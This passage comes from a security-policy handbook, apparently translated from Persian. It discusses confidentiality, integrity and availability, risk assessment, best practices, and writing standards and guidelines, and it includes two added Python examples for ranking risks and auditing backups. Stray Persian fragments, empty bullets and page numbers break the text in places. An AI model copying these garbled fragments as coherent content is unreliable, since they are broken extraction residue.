‫ﺳﺎﺯﻣﺎﻥ ﻳﻚ ﻓﺮﻫﻨﮓ ﻣﺆﺛﺮ ﺍﻣﻨﻴﺘﻲ ﺍﻳﺠﺎﺩ ﻭ ﺁﻧﺮﺍ ﺣﻔﻆ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ‬
‫ﻋﻮﺽ ﺍﻳﻦ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴـﺖ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﻮﺿﻮﻋﻲ ﻣﻬﻢ ﺑﻨﮕﺮﻧﺪ ﻭ ﺿﻮﺍﺑﻂ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﻧﺮﺍ ﻧﻈﻴﺮ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ‬
‫ﺑﭙﺬﻳﺮﻧﺪ ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻣﺆﺛﺮ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﻌﻨﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻫـﻢ ﻣﻬـﻢ ﺍﺳـﺖ ﺍﻣـﺎ ﺿـﺮﺭﻫﺎﻱ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺗﺨﺮﻳﺐ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﺭﺍﺣﺖﺗﺮ ﺍﺯ ﺿـﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ‬
‫ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺟﺒـﺮﺍﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﻛﻠﻴـﺔ ﻃﺮﺣﻬـﺎ‪،‬‬
‫ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎ ﺑﺎﻳــﺪ ﻣــﻨﻌﻜﺲﻛﻨﻨــﺪﺓ ﻧﻴــﺎﺯ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻫﺮ ﻗﺎﻟﺐ ﻣﻤﻜﻦ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﮔـﺮ‬
‫ﺑﻪ ﭼﺎﭖ ﺑﺮﺳﻨﺪ ﻳﺎ ﺑﻪ ﻳﻚ ﺩﻓﺘﺮ ﻓﻜـﺲ ﺷـﻮﻧﺪ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬
‫ﺩﺳﺖ ﻧﻤﻲﺩﻫﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻴـﺰ ﺍﮔـﺮ ﺑﺠـﺎﻱ‬
‫ﺍﺭﺳﺎﻝ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻠﻔﻦ ﮔـﺰﺍﺭﺵ‬
‫ﺷﺪﻧﺪ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺍﺭﺯﺵ ﺯﻳـﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ‪ .‬ﺧﻼﺻـﻪ ﺍﻳﻨﻜـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺩﺭ‬
‫ﭼﻪ ﻗﺎﻟﺒﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻭ ﺗﻌﺎﺭﻳﻒ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺠﺎﻱ ﺍﺭﺍﺋﻪ ﻳﻚ ﺗﻌﺮﻳﻒ ﺭﺳﻤﻲ‪ ،‬ﺗﻮﺟـﻪ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ‬
‫ﺭﻭﻳﻜﺮﺩ ﻋﻤﻠﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻧﻮﺍﻉ ﺣﻔﺎﻇﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻪ ﺑﺤﺚ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ‬
‫ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴﺖ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮﻳﻦ ﺷﻴﻮﻩﻫﺎ‬
‫ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻧﻌﻜﺎﺱ ﻧﻴﺎﺯﻫﺎ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ‬
‫ﺑﺮﺭﺳﻲ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗﺎﻳﻊ‬
‫‪١٤٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
Classifying Security Considerations
Within this broad definition, there are different kinds of security that administrators and users must pay attention to [71]:
Confidentiality
Protecting information from being read or copied by anyone who has not been authorized by the owner of that information. This type of security covers not only the protection of information as a whole, but also the protection of individual pieces of data that may be harmless in themselves but from several of which confidential information can be inferred.
Integrity
Protecting information (including programs) from being deleted or altered in any way without the permission of the owner of that information. Information to be protected includes accounting records, backup copies, file creation times, and documents.
Availability
Protecting services so that they are not degraded or destroyed without authorization. If the system and data are unavailable when an authorized user needs the information, the result can be as bad as having the information deleted from the system.
Consistency
Making sure that the system behaves as users expect it to. If software or hardware suddenly starts behaving very differently from before, especially after an upgrade or a bug fix, many problems can arise. Imagine what would happen when listing files if the "ls" command were accidentally deleted! This type of security can be described as assurance of the correctness of the data and software that are in use.
Control
Regulating access to the system. If unknown and unauthorized individuals (or software) are present in your system, they can cause a great deal of trouble, and you will worry about how they got in, what they may have done, and who else may have had access to your system. Recovering from such problems can be very time-consuming and expensive. You may have to reinstall and set up your system from scratch and only then find that no significant change had occurred, even if nothing at all actually happened.
71. See the COBIT approach to security guidelines: http://www.isaca.org/cobit.htm
Audit
Just as you are concerned about unauthorized people gaining access to the system, you must also consider the possibility that authorized users will make mistakes or act maliciously. In such cases you need to determine what was done, who did it, and what the effects were. The only sure way to get these answers is to have incorruptible records and logs of activity on the system that can identify the individuals and what they did. In some very sensitive applications, the audit trail may be extensive enough that, after the system has been put into a new state, it also allows a return to the original state.
Although all of these aspects of security matter, different organizations give each of them a different degree of importance. This difference arises because every organization has its own security concerns and must set its priorities and policies according to them. For example:
Banking environment
In such an environment, integrity, control, and audit are very important and vital principles, while confidentiality and availability come next.
Military environment
In a national defense system that holds classified information, confidentiality is of the highest importance and availability of the lowest. In some highly classified environments, officials may prefer to blow up a building rather than allow information to fall into the hands of attackers.
University environment
In such an environment, integrity and availability of information are the most important requirements. Making sure that information is available when students need it is far more important than administrators being able to determine when students used their accounts.
If you are a security administrator, you must understand the needs of the operational environment and its users, and then define your procedures on that basis. It goes without saying that the material described in this book is not necessarily suitable for every environment.
Trust
Security professionals do not usually describe computer systems as "secure" or "insecure"; instead they use the word "trust" to describe the level of confidence expected of a computer system. The reason is that absolute security can never be achieved. We can only approach it by building sufficient trust in the overall configuration and ensuring that it is used for the intended applications. Building sufficient trust in computer systems requires careful thought and planning. Operational decisions, and where possible overall policies, should be based on risk assessment, and for this purpose expert advice is very important:
If you work in a larger company, university, or government agency, we suggest that you contact the internal audit or risk management department of your organization for the help you need (they may use plans and policies that you need to know about). You can also learn more about this subject by consulting the resources listed in the appendices. You may want to enlist the help of a consulting firm. For example, many accounting and audit firms have teams of specialists who can evaluate the security of computer installations.
If you work with a smaller company or deal with personal computers, you may not have a specialized security department. In that case we suggest that you study Part Two of the book carefully. You may feel that this book goes into more detail than you need, but the information in these chapters will be a great help in setting your priorities.
Cost-Benefit Analysis and Best Practices
After completing a risk assessment, you will have a long list of risks in front of you, far more than you can possibly address or defend against. Because time and money are limited, you now need a way of ranking these risks so that you can decide which risks' impact and likelihood you want to reduce by technical means, which to insure against, and which simply to accept. Traditionally, the decision about which risks to counter and which to accept is made using a cost-benefit analysis: assigning a cost to each possible loss, determining the cost of defending against it, determining the probability of each risk occurring, and then determining whether the cost of defending against it exceeds the benefit of preventing it.
Risk assessment and cost-benefit analysis generate a lot of numbers, which makes the process look entirely scientific and logical, but in practice gathering and assembling these numbers can be very time-consuming and expensive, and the result is still only imprecise figures. Risk assessment depends on the ability to measure the expected use of an asset, estimate the probability of each risk to that asset, identify the factors that increase the likelihood of those risks, and calculate the potential impact of each choice, all of which are measures that are very hard to obtain. How do you calculate the risk that an attacker will be able to obtain administrator privileges on your system? Does this risk increase over time as new vulnerabilities are discovered, or decrease over time as vulnerabilities are fixed? Does a well-maintained system become more secure or less secure over time? And how do you calculate the approximate damages of a successful break-in? Unfortunately, few scientific and statistical studies have been done on these questions. Many people think they know the answers, but researchers have shown that most people cannot correctly estimate risks and their likelihood on the basis of personal experience.
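The cost-benefit steps described above (a cost for each loss, a probability, the cost of the countermeasure, then the comparison) can be run with a probability range instead of a single figure, which shows where the decision depends on an estimate nobody can make precisely. This is an added example, not part of the handbook; the risks, the figures and the `reduction` factor are constructed assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    name: str
    loss: float          # cost of one occurrence
    p_low: float         # yearly probability, optimistic estimate
    p_high: float        # yearly probability, pessimistic estimate
    control_cost: float  # yearly cost of the countermeasure
    reduction: float     # share of the probability the countermeasure removes (0..1)

    def __post_init__(self):
        if not 0 <= self.p_low <= self.p_high <= 1:
            raise ValueError(f"{self.name}: need 0 <= p_low <= p_high <= 1")
        if not 0 <= self.reduction <= 1:
            raise ValueError(f"{self.name}: reduction must be between 0 and 1")


def net_benefit(risk, probability):
    """Expected yearly loss avoided by the countermeasure, minus its yearly cost."""
    return risk.loss * probability * risk.reduction - risk.control_cost


def decide(risk):
    """'counter' or 'accept' when both estimates agree, otherwise flag the estimate."""
    if net_benefit(risk, risk.p_low) > 0:
        return "counter"             # pays for itself even on the optimistic estimate
    if net_benefit(risk, risk.p_high) <= 0:
        return "accept"              # never pays for itself; accept or insure instead
    return "estimate-dependent"      # the answer flips inside the probability range


def rank(risks):
    """Order risks by pessimistic expected yearly loss and attach a decision to each."""
    ordered = sorted(risks, key=lambda r: r.loss * r.p_high, reverse=True)
    return [(r.name, decide(r)) for r in ordered]


def sample_risks():
    """Constructed figures, for illustration only."""
    return [
        Risk("file server disk failure", 40_000, 0.10, 0.30, 2_000, 0.90),
        Risk("machine room flood", 500_000, 0.0005, 0.002, 30_000, 0.95),
        Risk("administrator account compromise", 250_000, 0.01, 0.10, 15_000, 0.80),
    ]


if __name__ == "__main__":
    for name, decision in rank(sample_risks()):
        print(f"{decision:20} {name}")
```

A risk that comes out as `estimate-dependent` is one where collecting better data is worth the effort; for the others the decision is the same anywhere in the range.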
Because of the inherent problems of the risk assessment method, another approach to computer security has emerged in recent years, called best practices or due care. This approach consists of a set of recommendations, procedures, and policies that are generally accepted within the community of security researchers, that bring organizations to an acceptable level of overall security, and that reduce risks at a reasonable cost. You can think of best practices as "the obvious basics of implementing security measures sensibly."
Using best practices has its own problems, too. The biggest is that there is no single set of best practices that suits every environment and every user. The best practices for a website that handles financial information may resemble those for the website of a community newsletter, but the site holding financial information will most likely need additional security measures.
Following best practices cannot guarantee that your system will never have a security problem. Under most best practices, the organization's security department must monitor the Internet for news of new attacks and download the patches released by software vendors. But even if you follow this regimen, attackers may still use new, unknown, and unpublished methods to take over your computer system. And if you are not well informed about the latest news, or if the person responsible for checking the mailing lists is away on a trip, the attacker will get ahead of you.
The idea that tens of thousands of organizations can or should implement the existing best practices to secure their computers is problematic, because the existing best practices are not suitable or cost-effective for every organization.
Many organizations that claim to follow best practices are in fact applying minimum standards to secure their machines; and in practice, best practices, or in other words optimal solutions, are not really optimal themselves!
Our recommendation is a combination of the two approaches, risk assessment and best practices. Starting from the body of a set of best practices, an informed designer should assess the risks and offer a reasonable solution for each particular case of the system. For example, servers should be placed on separate machines and configured with an operating system and software on which the minimum security capabilities are enabled. Operators should be aware of changes, keep themselves up to date with patches, and watch for unexpected events. Doing this properly requires a deep understanding of how the system works and of the reasons it may malfunction. This is the approach followed in the later parts of this book.
Chapter Five
Prevention and Organizational Security Policy
Overview
This chapter describes in full the different levels of security policy, in which every employee of the organization has a role to play in the security of computers, networks, and information. The management checklists referred to in this section can be found in the final chapters of this part of the book.
Security in a Working Organization
Security is not free. The more extensive your security measures become, the more they cost. Systems with higher security are usually harder to use. Security may also be threatened by power users, who want to carry out difficult and sometimes dangerous activities that they are often not authorized to perform and for whose consequences they are not accountable. Some of these users may hold political power within the organization. On the other hand, some organizations may feel that securing the organization to an appropriate level is very expensive, and for that reason carry on with their activities without taking the time to assess the real costs of these risks and without regard to security considerations.
At the end of Part Three, a set of checklists is provided that describe the steps needed to ensure the greatest possible safety at various levels, given time, personnel, and financial constraints.
After completing the risk assessment and cost-benefit analysis, you must convince the organization's management to act according to the plan. Normally, a policy is drawn up for this purpose, which must then be formally followed. This process is usually a hard battle.
The purpose of risk assessment and cost-benefit analysis is to prioritize your actions and the way you spend on security. If your business plan is such that you must not carry an uninsured risk costing more than a certain amount in a year, you can use risk assessment to work out what you have to spend to reach that goal. The assessment can also guide you as to which step to take first and which second, and which tasks to put off to later years. Another benefit of risk assessment is that it convinces the company's management that you need more resources for security.
Most managers know little about computers, but they do understand risk assessment and cost-benefit analysis. If you can show that the organization currently faces a risk that could cause large annual costs (to do this, add up the losses and the repair costs for everything currently in use), this estimate may convince management to invest more in resources and staff in order to avoid those risks.
On the other hand, if you go to management with vague statements such as "there is a good chance that several break-ins will occur on the Internet after the next CERT/CC announcement," it is very unlikely to produce anything more than very mild concern (and even that only in some cases)!
The Role of Security Policies
A security policy helps define the organization's assets and also specifies the steps that must be taken to protect them.
Security policies can be written in several different ways. You can write a very simple, general policy of a few pages that covers most eventualities. You can also write a specific policy for each of the different assets, such as an e-mail policy, a personnel data policy, and a user account information policy. A third approach, which many companies have adopted and which works for companies of all sizes, is to have simple, concise policies, standards, and guidelines that are augmented by best practices. In what follows we briefly describe this last approach; further resources on the subject are listed in the references section.
Policy plays three major roles. First, it makes clear what is being protected and why. Second, it states who is responsible for providing that protection. Third, it provides a basis for interpreting and resolving conflicts that may arise later. What a policy should not contain is a list of threats, machines, or individuals (by name). A policy should be general and should change rarely over time.
Standards
Standards are used to set out successful security practices in an organization, and their statements usually use the verb "must". Standards are generally written independently of particular technical platforms and provide at least one criterion for determining whether they have been met. Standards are developed in support of policy and change slowly over time. Standards might cover such things as how new hires are to be handled, how long backups must be kept, and how UPS systems are to be tested.
As an example, consider a standard for backups. It might read:
Backups must be made of all Internet data and software, on a regular schedule. Under no circumstances may routine backups be made less often than once every seventy-two hours. All backups must be kept for a period of at least six months; and the first backup of January and of June each year is kept permanently in a secure location outside the organization. A full backup of the entire system must be made at least every other week. All backup media must meet the accepted industry standards for their type, so that the information on them can still be recovered after at least five years in an unattended warehouse.
This standard does not name any particular backup mechanism or software package; it does, however, clearly state what must be stored, how long it must be stored, and how often this must be done.
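Because the sample backup standard above states measurable criteria (frequency, retention, full backups, permanent off-site copies), a backup catalogue can be checked against it mechanically. The following is an added example, not part of the handbook; the `Backup` record, the reading of "six months" as 183 days, and the sample catalogue are assumptions made for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

MAX_GAP = timedelta(hours=72)        # routine backups: at least once every 72 hours
MAX_FULL_GAP = timedelta(days=14)    # full backup: at least every other week
MIN_RETENTION = timedelta(days=183)  # "six months", taken here as 183 days (assumption)
ARCHIVE_MONTHS = (1, 6)              # first backup of January and June: permanent, off-site


@dataclass(frozen=True)
class Backup:
    taken: datetime
    full: bool = False
    expires: Optional[datetime] = None  # None means "kept permanently"
    offsite: bool = False


def _gaps(times, now, limit):
    """Yield (start, length) for each interval between runs, or up to now, over limit."""
    points = sorted(times) + [now]
    for prev, nxt in zip(points, points[1:]):
        if nxt - prev > limit:
            yield prev, nxt - prev


def audit(catalogue, now):
    """Return (rule, detail) findings; an empty list means the catalogue complies."""
    if not catalogue:
        return [("frequency", "no backups recorded")]
    findings = []
    for start, length in _gaps([b.taken for b in catalogue], now, MAX_GAP):
        findings.append(("frequency", f"{length} without a backup after {start:%Y-%m-%d}"))
    fulls = [b.taken for b in catalogue if b.full]
    if not fulls:
        findings.append(("full", "no full backup recorded"))
    for start, length in _gaps(fulls, now, MAX_FULL_GAP):
        findings.append(("full", f"{length} without a full backup after {start:%Y-%m-%d}"))
    for b in catalogue:
        if b.expires is not None and b.expires - b.taken < MIN_RETENTION:
            findings.append(("retention", f"{b.taken:%Y-%m-%d} is kept only {b.expires - b.taken}"))
    # First backup of every January and June that appears in the catalogue.
    first = {}
    for b in sorted(catalogue, key=lambda b: b.taken):
        if b.taken.month in ARCHIVE_MONTHS:
            first.setdefault((b.taken.year, b.taken.month), b)
    for (year, month), b in first.items():
        if b.expires is not None or not b.offsite:
            findings.append(("archive", f"first backup of {year}-{month:02d} is not a permanent off-site copy"))
    return findings


def sample_catalogue():
    """Constructed catalogue for January 2024 containing three deliberate violations."""
    keep = timedelta(days=200)

    def run(day, full=False, expires=keep, offsite=False):
        taken = datetime(2024, 1, day, 2, 0)
        return Backup(taken, full, None if expires is None else taken + expires, offsite)

    return [
        run(2, full=True, expires=None, offsite=True),  # archived first backup of January
        run(4), run(7),
        run(10, expires=timedelta(days=30)),            # kept for only 30 days
        run(16, full=True),                             # six days after the previous run
        run(19), run(22), run(25), run(28), run(31),    # no full backup after the 16th
    ]


if __name__ == "__main__":
    for rule, detail in audit(sample_catalogue(), datetime(2024, 2, 1, 2, 0)):
        print(f"{rule:10} {detail}")
```

The check only sees what the catalogue records, so it assumes the catalogue is complete for the months it covers and that a listed backup has actually been verified as readable.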
Consider a reasonable standard for authentication:
On a multi-user computer, every account must have only one user who is authorized to use it. That user must prove his or her identity to the system by means of an authenticator. Proof of identity to the computer can be provided by an authentication token, a smart card, a one-time password, or an approved biometric measure. Reusable passwords must not be used as the primary authentication mechanism on any computer that has ever been connected to a network, is portable outside the company, or has been used outside a private office.
Guidelines
Guidelines are documents that usually use the verb "should". The purpose of guidelines is to interpret standards for a particular environment, whether a software environment or a physical one. Unlike standards, guidelines change as needed. These elements of policy, as their name suggests, are not usually used as standards of performance, but rather as ways to help get the job done.
Below is a sample guideline for backups:
Backups on Unix-based machines should be made with the "dump" program. Systems that are not in use 24 hours a day should be backed up overnight in single-user mode. Systems that operate around the clock should be backed up at the shift change closest to midnight (when the system load is at its lowest). All backups should be read back immediately after being written, to verify that the information was written correctly.
A level 0 dump is made at the first backup of January and of June. Level 3 backups should be made on the first and fifteenth of each month. Level 5 backups should be made every Monday and Thursday night, unless a level 0 or level 3 backup was made on the same day. A level 7 backup should be made every other night, except on holidays.
Each week, the system administrator randomly selects a file from a backup made that week, and a member of the backup staff restores that file from the backups to confirm that the backup procedures are working correctly.
Guidelines are written for particular architectures and specific machines, and they change at shorter intervals than standards so that they can properly reflect changing conditions.
Key Points in Developing an Effective Policy
The role of policy (and the associated standards and guidelines) is to help protect the things that, taken together, you consider important. In most cases the policy need not be specialized or complicated. Sometimes a simple rule is enough as the entire policy for your environment, as in the following example:
The use and protection of this system is everyone's responsibility. Only do things you would want others to do as well. Respect the privacy of other users. If you run into a problem, try to fix it yourself or report it promptly. Respect the rules governing use of the system. Take responsibility for your own actions and always identify yourself. Enjoy your work.
Sometimes you will also need a more formal policy, reviewed by an official specialist and several security advisors, to protect your assets. Every organization's policy differs from every other's, because each organization always has particular considerations that need to be addressed separately in the policies it writes.
Assign an Owner
Every piece of information and equipment that is to be protected should have a designated owner. The "owner" is the person who is responsible for the copying, destruction, backup, and other aspects of protecting the information. The owner is also one of the people authorized to have access to the information.
The security problem in many organizations is that important information exists that has no clear owner. As a result, users do not know who makes decisions about storing the information or who sets the rules for access to it. Sometimes information (and equipment too) disappears for a long time without anyone noticing, because no one is responsible for it and keeping watch.
Be Positive
People respond better to positive, affirmative statements than to negative, prohibiting ones. Instead of drawing up long lists of "don't do this" statements, think about how you can phrase the same rules positively. The short policy given earlier could be written as a set of "don'ts" as follows; but notice how much easier the earlier wording was to read:
It is your duty not to allow the system to be misused. Do not do things you would not like others to do. Do not violate the privacy of others. If you find a problem and cannot fix it, do not keep it hidden. Do not break the rules for using the system. Do not try to shift responsibility for your actions onto others, and do not conceal your identity. We hope you do not have a bad time!
When you write policies, always keep users' behavior in mind. They make mistakes and they misinterpret things. Your policy should not be one that treats users as deserving of every punishment when they make a mistake.
Beyond this, bear in mind that information systems may contain data about users, and that users may want to keep that information private to some extent. This private information can include e-mail, personnel records, and job evaluations. This information therefore needs to be protected too, although you may not be able to guarantee that it stays private. In short, do not lose sight of users' needs and feelings.
Concentrate on Education and Awareness
You can make the standards part of the training and retraining program for all users. Every user should have a basic awareness of security, and should then be reminded of that material on a set schedule and in a set format (even if the reminder consists only of handing staff a copy of this book!). Trained users are less likely to fall for tricks, and in particular for social engineering attacks. Also, if users know why each security measure is in place, they are more likely to be comfortable with the measures and to carry each one out correctly.
A vital part of any security system is giving staff time and support for further education and training. There are always new tools, new threats, new techniques, and new information to learn. Staff who spend 60 hours a week chasing phantom PC viruses and making backups are still not as effective as staff who are given just a few weeks of training a year. Beyond that, if they are given the opportunity to grow and learn on the job, and are allowed to spend evenings and weekends with their families instead of installing software and making backups, they will be happier and more satisfied with their work.
Distribute authority in proportion to responsibility. A principle of security administration says:
If you have responsibility for security but have been given no authority to set rules and punish violators, then when a major problem occurs it is you who will be blamed.
Although this principle holds in most cases, the real responsibility lies with whoever failed to distribute authority in proportion to responsibility.
This part contains checklists for the managers and staff who are responsible for security. In this part we cover the important elements of every organization's security plan, including communication, awareness, training, and adequate funding to support the plan.
Be Sure You Know Your Security Perimeter
When you write your policy, you must make sure that you know all the different kinds of systems, networks, personnel, and storage media within your security perimeter and have taken all of them into account. This knowledge defines what you are concerned about. When you draw up policies, you must make sure you have not left out anything that is inside your perimeter or that can enter it and interact with your information resources. In past years, many organizations defined their IT security perimeter by the same boundaries formed by their walls and fences; but today organizational perimeters are rarely so static.
When drawing up your policies, you should consider points such as the following:
• When you are away from your physical location, you can use portable computers and PDAs to access information. These devices can store sensitive information such as IP addresses, telephone numbers, and passwords. These systems should have a minimum level of security, for example through encryption or at least markings for physical security. Users should be aware of and trained in the risks of theft and eavesdropping.
• Wireless networks that are used in buildings or connected to site equipment can be reached by outsiders using directional antennas, or by parking a car outside the building and using a laptop inside the car. Wireless networks should be configured and protected so that their sensitive information cannot be observed outside the site and so that attackers' malicious code is kept out of them.
• Computers used at home by the organization's staff may be exposed to intrusion, theft, and the introduction of malicious code, and may also be used contrary to the organization's policies (for example, to run an independent business or to host a web server with questionable content). The policy must make clear how these computers are to be used, protected, and audited.
• Storage media are usually portable and compact. If someone puts a copy of the company's financial records on a CD or DVD for use at a remote site, what happens if that media is stolen or misplaced? Policies should specify who may take media off the premises, how that information must be protected (which includes encryption), and what must be done if the media is stolen or lost. It should also be spelled out in detail how previously used media is to be destroyed, so as to reduce the risk of the information on it being disclosed.
and try to have suitable answers to the following questions:
• Which policies cover people who bring their own PDAs and laptops to the workplace for meetings or simply while visiting? What are the rules for connecting them to the workplace's networks, telephone lines, printers, and other devices?
• What provisions have been made for taking computers or storage devices off the premises (for example, for repair)? What happens if there is sensitive information on the disks? What approach has been adopted for leased equipment that is returned to its owners?
• If business partners or contractors have access to your equipment, whether at your workplace or at theirs, who will protect the information? How do you prevent your sensitive data from being unintentionally mixed with theirs?
• What policies deal with information that has been sent to your organization under a "trade secret" designation? Who is responsible for protecting that information, and where may it be kept?
• What policies govern non-computer information processing equipment? For example, what policies have been written for the use of printers, copiers, and fax machines? (Keep in mind that sensitive information on paper is just as important as sensitive information on a computer.)
Thinking about all of these issues before any problem occurs helps prevent the problem from happening. Building meaningful statements into the security policy helps everyone understand the concerns and apply the right preventive mechanisms.
Adopt a Basic Approach to Security Issues
First decide which of the following models you want to follow: "Whatever is not explicitly prohibited is permitted" or "Whatever is not explicitly permitted is prohibited." Then decide how you want to define everything else. The first may suit a fairly open environment, such as a university, while the second is better suited to a commercial institution, such as a bank.
‫ﻭﻗﺘﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺖ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣﻘﺎﺑﻠـﺔ ﺧـﻮﺩ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺩﺭ ﻳﻚ ﻻﻳﻪ ﻣﺘﻮﻗﻒ ﻧـﺸﻮﻳﺪ ﻭ ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻣﺨﺘﻠﻒ‪ ،‬ﭼﻨﺪ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﻫﻤﭙﻮﺷﺎﻥ ﻭ ﻣﺴﺘﻘﻞ ﺑﻨـﺎ‬
‫ﻧﻤﺎﺋﻴﺪ‪ .‬ﺳﭙﺲ ﻧﻈﺎﺭﺕ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺁﻥ ﻣﺠﻤﻮﻋﻪ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ‬
‫ﺗﺎ ﻣﻄﺌﻤﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺗﺨﺎﺫﺷﺪﻩ‪ ،‬ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ‬
‫ﻭﺍﻗﻌﹰﺎ ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ‪ .‬ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳﺰ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﺗﻨﻬـﺎ ﻳـﻚ‬
‫ﻼ ﺳـﻪ‬
‫ﻣﺠﻤﻮﻋﺔ ﺩﻓﺎﻋﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳـﺰﺵ ﺍﺯ ﻣـﺜ ﹰ‬
‫‪٨٢‬‬
‫ﻣﺮﺣﻠﺔ ﺩﻓﺎﻋﻲ ﺑﻌﻼﻭﺓ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺧﻄﺎﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
[82] Defense in depth. See the following source by Tom Kellermann: "The 12 Layer Matrix: Building a Cyber-Fortress (2003)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Tools
Enforcement and Security Audits
Formulating a policy is not enough on its own; it must be checked regularly whether the adopted policy is being applied correctly and, if it is, whether it is sufficient and correct. The word audit has taken on new connotations and is currently used in at least the following senses: financial audit, audit trails (using log files), security audit of a system, and policy compliance audit.
